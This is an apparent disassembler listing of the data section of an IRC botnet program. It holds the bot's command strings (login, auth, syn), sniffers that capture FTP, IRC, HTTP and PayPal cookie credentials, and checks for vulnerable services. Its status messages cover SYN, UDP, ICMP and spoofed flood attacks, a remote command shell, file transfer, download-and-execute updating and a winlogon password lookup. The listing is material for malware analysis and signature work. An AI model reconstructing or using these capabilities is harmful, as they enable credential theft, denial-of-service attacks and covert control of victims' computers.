dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_436B7C dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_4126A7+48F�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_4125FC+31�o
; sub_41AF8F+EB�o
a__S_l_ReturnS db '.».%s.«. (Return) (%s)',0 ; DATA XREF: sub_4126A7+3FA�o
align 4
a__S_l_Return db '.».%s.«. (Return)',0 ; DATA XREF: sub_4126A7+3D9�o
align 4
a__S_l_Buffer_0 db '.».%s.«. (Buffer full) (%s)',0 ; DATA XREF: sub_4126A7+394�o
a__S_l_BufferFu db '.».%s.«. (Buffer full)',0 ; DATA XREF: sub_4126A7+382�o
align 4
a__S_l_ChangedW db '.».%s.«. (Changed Windows: %s)',0 ; DATA XREF: sub_4126A7+17B�o
align 4
a__S_l_ db '.».%s.«.',0 ; DATA XREF: sub_4126A7+B9�o
; sub_4126A7+145�o ...
align 4
off_436C48 dd offset dword_4374C0 ; DATA XREF: sub_412B61+2B9�r
dd offset off_4374BC
dd offset aFtp ; "FTP"
dd offset aHttp_0 ; "HTTP"
a_login db ':.login',0 ; DATA XREF: sub_412B61+1DE�o
dd 3 dup(0)
dword_436C6C dd 0 ; DATA XREF: sub_412B61+2B2�r
aLogin_2 db ':,login',0
dd 4 dup(0)
aLogin_3 db ':!login',0
dd 4 dup(0)
a@login db ':@login',0
dd 4 dup(0)
aLogin_4 db ':$login',0
dd 4 dup(0)
aLogin_5 db ':%login',0
dd 4 dup(0)
aLogin_6 db ':^login',0
dd 4 dup(0)
aLogin_7 db ':&login',0
dd 4 dup(0)
aLogin_8 db ':*login',0
dd 4 dup(0)
aLogin_9 db ':-login',0
dd 4 dup(0)
aLogin_10 db ':+login',0
dd 4 dup(0)
aLogin_11 db ':/login',0
dd 4 dup(0)
aLogin_12 db ':\login',0
dd 4 dup(0)
aLogin_13 db ':=login',0
dd 4 dup(0)
a?login db ':?login',0
dd 4 dup(0)
aLogin_14 db ':',27h,'login',0
dd 4 dup(0)
aLogin_15 db ':`login',0
dd 4 dup(0)
aLogin_16 db ':~login',0
dd 4 dup(0)
aLogin_17 db ': login',0
dd 4 dup(0)
a_auth db ':.auth',0
align 4
dd 4 dup(0)
aAuth db ':,auth',0
align 10h
dd 4 dup(0)
aAuth_0 db ':!auth',0
align 4
dd 4 dup(0)
a@auth db ':@auth',0
align 10h
dd 4 dup(0)
aAuth_1 db ':$auth',0
align 4
dd 4 dup(0)
aAuth_2 db ':%auth',0
align 10h
dd 4 dup(0)
aAuth_3 db ':^auth',0
align 4
dd 4 dup(0)
aAuth_4 db ':&auth',0
align 10h
dd 4 dup(0)
aAuth_5 db ':*auth',0
align 4
dd 4 dup(0)
aAuth_6 db ':-auth',0
align 10h
dd 4 dup(0)
aAuth_7 db ':+auth',0
align 4
dd 4 dup(0)
aAuth_8 db ':/auth',0
align 10h
dd 4 dup(0)
aAuth_9 db ':\auth',0
align 4
dd 4 dup(0)
aAuth_10 db ':=auth',0
align 10h
dd 4 dup(0)
a?auth db ':?auth',0
align 4
dd 4 dup(0)
aAuth_11 db ':',27h,'auth',0
align 10h
dd 4 dup(0)
aAuth_12 db ':`auth',0
align 4
dd 4 dup(0)
aAuth_13 db ':~auth',0
align 10h
dd 4 dup(0)
aAuth_14 db ': auth',0
align 4
dd 4 dup(0)
a_id db ':.id',0
align 10h
dd 4 dup(0)
aId_0 db ':,id',0
align 4
dd 4 dup(0)
aId_1 db ':!id',0
align 10h
dd 4 dup(0)
a@id db ':@id',0
align 4
dd 4 dup(0)
aId_2 db ':$id',0
align 10h
dd 4 dup(0)
aId_3 db ':%id',0
align 4
dd 4 dup(0)
aId_4 db ':^id',0
align 10h
dd 4 dup(0)
aId_5 db ':&id',0
align 4
dd 4 dup(0)
aId_6 db ':*id',0
align 10h
dd 4 dup(0)
aId_7 db ':-id',0
align 4
dd 4 dup(0)
aId_8 db ':+id',0
align 10h
dd 4 dup(0)
aId_9 db ':/id',0
align 4
dd 4 dup(0)
aId_10 db ':\id',0
align 10h
dd 4 dup(0)
aId_11 db ':=id',0
align 4
dd 4 dup(0)
a?id db ':?id',0
align 10h
dd 4 dup(0)
aId_12 db ':',27h,'id',0
align 4
dd 4 dup(0)
aId_13 db ':`id',0
align 10h
dd 4 dup(0)
aId_14 db ':~id',0
align 4
dd 4 dup(0)
aId_15 db ': id',0
align 10h
dd 4 dup(0)
a_hashin_0 db ':.hashin',0
align 4
dd 3 dup(0)
aHashin_0 db ':!hashin',0
align 10h
aHashin_1 db ':$hashin',0
align 4
dd 3 dup(0)
aHashin_2 db ':%hashin',0
align 10h
a_secure db ':.secure',0
align 4
dd 3 dup(0)
aSecure_1 db ':!secure',0
align 10h
a_l db ':.l',0
dd 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
a_syn db ':.syn',0
align 4
dd 4 dup(0)
aSyn_0 db ':!syn',0
align 10h
dd 4 dup(0)
aSyn_1 db ':$syn',0
align 4
dd 4 dup(0)
aSyn_2 db ':%syn',0
align 10h
dd 4 dup(0)
aCdkey db ' CDKey ',0
dd 4 dup(0)
aJoin_1 db 'JOIN #',0
align 10h
dd 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
aHttp_0 db 'HTTP',0 ; DATA XREF: .data:00436C54�o
align 4
aFtp db 'FTP',0 ; DATA XREF: .data:00436C50�o
off_4374BC dd offset aFailedToSta_36+25h ; DATA XREF: .data:00436C4C�o
dword_4374C0 dd 544F42h ; DATA XREF: .data:off_436C48�o
dword_4374C4 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_412B61+317�o
aRecvFailedRetu db '- recv() failed, returned %d',0
align 10h
dword_4374F0 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_412B61+2C6�o
aSuspiciousSPac db '- suspicious %s packet from: %s:%d - %s',0
dword_437524 dd 234032Dh, 696E7370h, 3026666h, 2Dh ; DATA XREF: sub_412B61+24C�o
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_412B61+235�o
align 10h
dword_437540 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_412B61+186�o
aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0
align 10h
dword_437570 dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_412B61+103�o
aBindFailedRetu db '- bind() failed, returned %d',0
align 4
dword_43759C dd 234032Dh, 696E7370h, 3026666h ; DATA XREF: sub_412B61+85�o
aSocketFailedRe db '- socket() failed, returned %d',0
align 4
aHashin db ':!hashin',0 ; DATA XREF: sub_412EEC+103�o
align 4
a_hashin db ':.hashin',0 ; DATA XREF: sub_412EEC+EE�o
align 10h
aIdent_0 db ':!ident',0 ; DATA XREF: sub_412EEC+D9�o
a_ident db ':.ident',0 ; DATA XREF: sub_412EEC+C8�o
a_login_1 db ':.Login',0 ; DATA XREF: sub_412EEC+B7�o
aLogin_0 db ':!Login',0 ; DATA XREF: sub_412EEC+A6�o
aLogin db ':!login',0 ; DATA XREF: sub_412EEC+95�o
a_login_0 db ':.login',0 ; DATA XREF: sub_412EEC+84�o
a366 db '366 ',0 ; DATA XREF: sub_412EEC+73�o
align 4
a302 db '302 ',0 ; DATA XREF: sub_412EEC:loc_412F4E�o
align 10h
aJoin_0 db 'JOIN #',0 ; DATA XREF: sub_412EEC+4D�o
align 4
aPsniff_2 db 'PSNIFF//',0 ; DATA XREF: sub_412EEC+3C�o
align 4
aPsniff_1 db '[PSNIFF]:',0 ; DATA XREF: sub_412EEC+2B�o
align 10h
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_412EEC+5�o
align 4
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_413003+62�o
aOper_0 db 'oper ',0 ; DATA XREF: sub_413003+51�o
align 10h
aNick_1 db 'NICK ',0 ; DATA XREF: sub_413003:loc_413043�o
; sub_413079+2B�o
align 4
aOper db 'OPER ',0 ; DATA XREF: sub_413003+2B�o
align 10h
aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_413003+5�o
align 4
aPass_0 db 'PASS ',0 ; DATA XREF: sub_413079+73�o
align 4
aUser_2 db 'USER ',0 ; DATA XREF: sub_413079+62�o
align 4
a230 db '230 ',0 ; DATA XREF: sub_413079:loc_4130CA�o
align 4
a220 db '220 ',0 ; DATA XREF: sub_413079+3C�o
align 4
aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_413079+5�o
align 4
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_413100+73�o
aPaypal_com_0 db 'paypal.com',0 ; DATA XREF: sub_413100+62�o
align 10h
aPaypal_com db 'PAYPAL.COM',0 ; DATA XREF: sub_413100+51�o
align 4
aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_413100:loc_413140�o
align 4
aPaypal db 'paypal',0 ; DATA XREF: sub_413100+2B�o
align 4
aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_413100+5�o
align 4
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_413187+51�o
align 4
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_413187:loc_4131C7�o
align 4
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_413187+2B�o
align 4
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_413187+5�o
align 4
unk_437734 db 2Dh ; - ; DATA XREF: sub_4131EC+3EC�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVulnSniffSDToS db '- VULN sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_43776C db 2Dh ; - ; DATA XREF: sub_4131EC+382�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aHttpSniffSDToS db '- HTTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_4377A4 db 2Dh ; - ; DATA XREF: sub_4131EC+351�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0
unk_4377D8 db 2Dh ; - ; DATA XREF: sub_4131EC+31B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0
unk_43780C db 2Dh ; - ; DATA XREF: sub_4131EC+2E2�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0
unk_437840 db 2Dh ; - ; DATA XREF: sub_4131EC+14B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aWsaioctlFail_0 db '- WSAIoctl() failed, returned %d',0
align 10h
unk_437870 db 2Dh ; - ; DATA XREF: sub_4131EC+C5�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBindFailedRe_0 db '- bind() failed, returned %d',0
align 4
unk_43789C db 2Dh ; - ; DATA XREF: sub_4135DF+5E�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aDoneWithFloodA db 'done with flood at %iKB/sec',0
dword_4378C4 dd 234032Dh, 736F6464h, 202D0302h, 646E6573h, 72726520h
; DATA XREF: sub_413694+302�o
dd 203A726Fh, 6425h
unk_4378E0 db 2Dh ; - ; DATA XREF: sub_413A29+397�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0
align 4
unk_43792C db 2Dh ; - ; DATA XREF: sub_413A29+307�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0
align 4
unk_437974 db 2Dh ; - ; DATA XREF: sub_413A29+12A�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidTargetI db 'invalid target ip',0
align 4
unk_437994 db 2Dh ; - ; DATA XREF: sub_413A29+C2�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSetsockoptFail db 'setsockopt() failed, returned %d',0
align 4
unk_4379C4 db 2Dh ; - ; DATA XREF: sub_413A29+49�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSocketFailed_0 db 'socket() failed, returned %d',0
align 10h
unk_4379F0 db 2Dh ; - ; DATA XREF: sub_413E10+13C�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFinishedSendin db 'finished sending pings to %s',0
align 4
unk_437A1C db 2Dh ; - ; DATA XREF: sub_413E10+6E�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aErrorSendingPi db 'error sending pings to %s',0
align 4
unk_437A44 db 2Dh ; - ; DATA XREF: sub_413F9C+1C6�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFinishedSend_0 db '- finished sending packets to %s',0
align 10h
unk_437A70 db 2Dh ; - ; DATA XREF: sub_413F9C+8E�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aErrorSending_0 db '- error sending packets to %s',0
align 4
dword_437A98 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_4141B2+4B�o
aDoneWithFloodI db '- Done with flood (%iKB/sec)',0
align 4
unk_437AC4 db 2Dh ; - ; DATA XREF: sub_414358+4B�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0
align 4
unk_437AEC db 2Dh ; - ; DATA XREF: sub_4143F7+27D�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aSendErrorD_ db '- Send error: <%d>.',0
align 4
dword_437B0C dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_414703+4F�o
aDoneWithFlood_ db '- Done with flood.',0
align 4
unk_437B2C db 2Dh ; - ; DATA XREF: sub_4149C1+4EB�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
unk_437B7C db 2Dh ; - ; DATA XREF: sub_4149C1+44F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
unk_437BCC db 2Dh ; - ; DATA XREF: sub_4149C1+15F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidTarge_0 db '- Invalid target IP.',0
align 4
unk_437BEC db 2Dh ; - ; DATA XREF: sub_4149C1+EE�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0
align 4
unk_437C24 db 2Dh ; - ; DATA XREF: sub_4149C1+70�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSocketFai db '- Error: socket() failed, returned: <%d>.',0
align 4
unk_437C58 db 2Dh ; - ; DATA XREF: sub_414F57+66�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aDoneWithFloodD db '- Done with flood, %d packets sent.',0
align 4
unk_437C8C db 2Dh ; - ; DATA XREF: sub_41525A+4D�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0
align 4
unk_437CCC db 2Dh ; - ; DATA XREF: sub_4152D1+345�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError('
db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
unk_437D58 db 2Dh ; - ; DATA XREF: sub_4152D1+2F3�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFinishedSend_1 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat'
db 'a sent (~%dK/s).',0
align 4
unk_437DBC db 2Dh ; - ; DATA XREF: sub_4152D1+CC�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aSendingPackets db '- Sending packets to %s...',0
unk_437DE8 db 2Dh ; - ; DATA XREF: sub_4152D1+80�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0
unk_437E2C db 2Dh ; - ; DATA XREF: sub_4152D1+63�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0
align 4
unk_437E7C db 2Dh ; - ; DATA XREF: sub_4152D1+2A�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSo db '- Error calling socket().',0
align 4
unk_437EA8 db 2Dh ; - ; DATA XREF: sub_41561D+60�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aDoneWithFloodP db 'Done with flood, ports hit: %s',0
align 4
aSD db '%s%d ',0 ; DATA XREF: sub_4157BA+204�o
align 4
dword_437EDC dd 202E6425h, 73253403h, 203D2003h, 73253703h, 3 ; DATA XREF: sub_415CC0+35�o
dword_437EF0 dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_415CC0+10�o
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_415D38+60�o
align 4
dword_437F28 dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h
; DATA XREF: sub_415DD8:loc_415E0D�o
dword_437F3C dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h
; DATA XREF: sub_415DD8+20�o
dword_437F50 dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h
; DATA XREF: sub_415E4B+DC�o
dd 6574656Ch, 0
dword_437F6C dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h
; DATA XREF: sub_415E4B+3F�o
dd 676E6974h, 0
unk_437F88 db 2Dh ; - ; DATA XREF: sub_416000+170�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSendTo db '- failed to send to Remote command shell',0
align 4
unk_437FBC db 2Dh ; - ; DATA XREF: sub_416000+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenRe db '- failed to open remote command shell',0
align 4
unk_437FEC db 2Dh ; - ; DATA XREF: sub_416000+47�o
; sub_4161C1+FD�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenSo db '- failed to open socket',0
align 10h
dword_438010 dd 234032Dh, 2636364h, 73202D03h, 656B636Fh, 72652074h
; DATA XREF: sub_4161C1+362�o
; sub_416563+156�o
dd 726F72h
unk_438028 db 2Dh ; - ; DATA XREF: sub_4161C1+2FA�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileSSentToSSB db '- file %s sent to %s (%s bytes).',0
align 4
unk_438054 db 2Dh ; - ; DATA XREF: sub_4161C1+202�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aUnableToOpenSo db '- unable to open socket',0
align 4
dword_438078 dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h
; DATA XREF: sub_4161C1+1CB�o
dd 74756Fh
dword_438090 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_4161C1+16A�o
dd 169h
unk_4380A8 db 2Dh ; - ; DATA XREF: sub_4161C1+127�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileDoesnTExis db '- file doesn',27h,'t exist',0
align 4
unk_4380C8 db 2Dh ; - ; DATA XREF: sub_4161C1+82�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToBindTo db '- failed to bind to socket',0
unk_4380EC db 2Dh ; - ; DATA XREF: sub_4161C1+44�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToCrea_2 db '- failed to create socket',0
align 10h
unk_438110 db 2Dh ; - ; DATA XREF: sub_416563+1D1�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceivedSFromS db '- received %s from %s (%s bytes).',0
align 4
unk_43813C db 2Dh ; - ; DATA XREF: sub_416563+CB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningSo db '- error opening socket',0
unk_43815C db 2Dh ; - ; DATA XREF: sub_416563+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningFi db '- error opening file for writing',0
align 4
aAB db 'a+b',0 ; DATA XREF: sub_416563+97�o
unk_43818C db 2Dh ; - ; DATA XREF: sub_416563+83�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorUnableToW db '- error unable to write file to disk',0
align 4
unk_4381BC db 2Dh ; - ; DATA XREF: sub_4167A0+493�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aBadUrlOrDnsErr db 'bad url or dns error at %s.',0
unk_4381E8 db 2Dh ; - ; DATA XREF: sub_4167A0+485�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aUpdateFailedEr db 'update failed, error executing %s',0
align 4
unk_43821C db 2Dh ; - ; DATA XREF: sub_4167A0+3C9�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fk db 'downloaded %.1fKB to %s @ %.1fKB/sec, updating bot',0
align 10h
dword_438260 dd 234032Dh, 6E776F64h, 64616F6Ch, 202D0302h, 6E65706Fh
; DATA XREF: sub_4167A0+358�o
dd 25206465h, 73h
unk_43827C db 2Dh ; - ; DATA XREF: sub_4167A0+2E1�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fK db 'downloaded %.1f KB to %s @ %.1f KB/sec',0
align 4
unk_4382B4 db 2Dh ; - ; DATA XREF: sub_4167A0+262�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongCrcDD_ db 'wrong crc (%d != %d).',0
align 4
unk_4382DC db 2Dh ; - ; DATA XREF: sub_4167A0+1D8�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongFilesizeD db 'wrong filesize (%d != %d).',0
align 4
unk_438308 db 2Dh ; - ; DATA XREF: sub_4167A0+195�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aGotUpdateSDkb_ db 'got update %s (%dKB).',0
align 10h
unk_438330 db 2Dh ; - ; DATA XREF: sub_4167A0+183�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadedSDkb db 'downloaded %s (%dKB)',0
align 4
unk_438358 db 2Dh ; - ; DATA XREF: sub_4167A0+77�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_416D48:loc_416D8B�o
; sub_419443+10A�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_416D48:loc_416D85�o
aDisk db 'Disk',0 ; DATA XREF: sub_416D48:loc_416D7F�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_416D48:loc_416D79�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_416D48:loc_416D73�o
align 4
off_4383A8 dd offset word_4D4152 ; DATA XREF: sub_416D48:loc_416D6D�o
word_4383AC dw 3Fh ; DATA XREF: sub_416D48+1F�o
; sub_41AF8F:loc_41B091�r
align 10h
aFailed db 'failed',0 ; DATA XREF: sub_416DD9:loc_416EB7�o
; sub_416EFD+3B�o
align 4
aSkb db '%sKB',0 ; DATA XREF: sub_416DD9+6C�o
align 10h
unk_4383C0 db 2Dh ; - ; DATA XREF: sub_416EFD+8E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0
align 4
unk_4383FC db 2Dh ; - ; DATA XREF: sub_416EFD+58�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0
aA_1 db 'A:\',0 ; DATA XREF: sub_416FCF:loc_417014�o
dword_43843C dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h
; DATA XREF: sub_417054+C8�o
dd 64252064h, 6C696620h, 7365h
unk_43845C db 2Dh ; - ; DATA XREF: sub_417054+5C�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingFor_0 db 'searching for file %s',0
align 4
dword_438484 dd 234032Dh, 646E6966h, 656C6966h, 202D0302h, 6E756F66h
; DATA XREF: sub_41716F+107�o
dd 73252064h, 73255Ch
aS_3 db '%s\*',0 ; DATA XREF: sub_41716F+1A�o
align 4
unk_4384A8 db 2Dh ; - ; DATA XREF: sub_4172C1:loc_41743A�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToEnable db 'failed to enable debug privilege',0
align 4
unk_4384DC db 2Dh ; - ; DATA XREF: sub_4172C1:loc_41740D�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindWi db 'unable to find winlogon pid',0
unk_438508 db 2Dh ; - ; DATA XREF: sub_4172C1:loc_417406�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
